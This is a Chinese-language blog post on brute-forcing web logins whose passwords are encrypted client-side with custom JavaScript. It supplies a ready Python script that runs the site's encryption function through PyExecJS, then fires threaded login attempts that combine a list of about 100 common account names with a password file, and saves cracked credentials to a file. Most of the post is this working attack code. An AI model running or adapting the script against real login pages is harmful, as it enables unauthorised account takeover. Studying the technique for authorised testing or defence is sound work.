繞過前端加密進行爆破(附指令碼)
阿新 • • 發佈:2018-12-18
在滲透的過程中,有時候會遇到密碼在前端加密了,為我們爆破提高了難度。加密是js指令碼自定義函式加密,burp裡面的一些加密函式就滿足不了我們的需求。如下所示,密碼為admin123,加密的效果如下:
可以看到加密的函式主要是encode,所以每個密碼都由自定義函式加密。
最近在實戰過程中get到一個new trick,利用相應的工具或者模組執行該 js 檔案,拿到輸出結果即可,可以使用 python 自帶的execjs。
安裝
先安裝 execjs
pip install PyExecJS
將js程式碼儲存在本地。
#coding:utf-8
from selenium import webdriver
import execjs
with open ('test.js','r') as jj:
source = jj.read()
phantom = execjs.get('PhantomJS')
getpass = phantom.compile(source)
mypass = getpass.call('encrypt', 'admin','admin123')
print mypass
利用以上程式碼可獲得相應的密碼。
爆破
自動化走起,寫了一個python指令碼進行滲透爆破。
#coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import requests
import re
import base64
import time
import random
import threading
from selenium import webdriver
import execjs
def brute(user,password,UA):
url = 'http://xxx/login'
with open('test.js', 'r') as jj:
source = jj.read()
# phantom = execjs.get('PhantomJS')
phantom = execjs.get()
getpass = phantom.compile(source)
print user, password
mypass = getpass.call('encode', user, password)
passwd = mypass
print passwd
post_data = {}
post_data['userName'] = user
post_data['userPass'] = passwd
post_data['verifyCode'] = 'dsvx'
headers ={
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "http://xxx/",
"Connection": "close"}
resp = requests.post(url=url,data=post_data,headers=headers)
print user+"#"+password+" "+resp.content
if not resp.content.find(u'請檢查賬號和密碼') > 0 :
print '*** find user:', user, 'with password:', password, '***'
with open('accounts-cracked.txt', 'a+') as f:
f.write(user + ' ' + passwd + '\n')
def main():
tsk = []
user_list = ['admin','noreply','hr','jobs','qiniu','lietou','demo','ceo','dev','root','service','fuwu','yunying','webmaster','wechat','weixin','weibo','tec','bd','bf','op','shop','test','pm','kefu','cdn','marketing','zhaopin','suggestion','warning','risk','system','pay','payment','management','feedback','guanli','ci','ad','td','news','cert','sdk','pmd','appstore','development','it','fankui','notify','bugs','security','sec','alipay','yunwei','message','support','ceshi','developer','notice','redmine','alert','kaifa','seo','git','vpn','jenkins','jira','zabbix','chandao','nagios','monitor','account','jubao','backup','open','openapi','github','reload','blacklist','buyer','caiwu','order','postmaster','pr','report','public','download','som','ops','devops','caigou','pmp','monit']
f1 = open('pass2.txt','r')
for i in f1.readlines():
password = i.strip()
for j in user_list:
user = j
UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0"
t = threading.Thread(target = brute,args = (user,password,UA))
tsk.append(t)
for t in tsk:
t.start()
t.join()#阻塞(0.1)
if __name__ == '__main__':
main()
效果圖: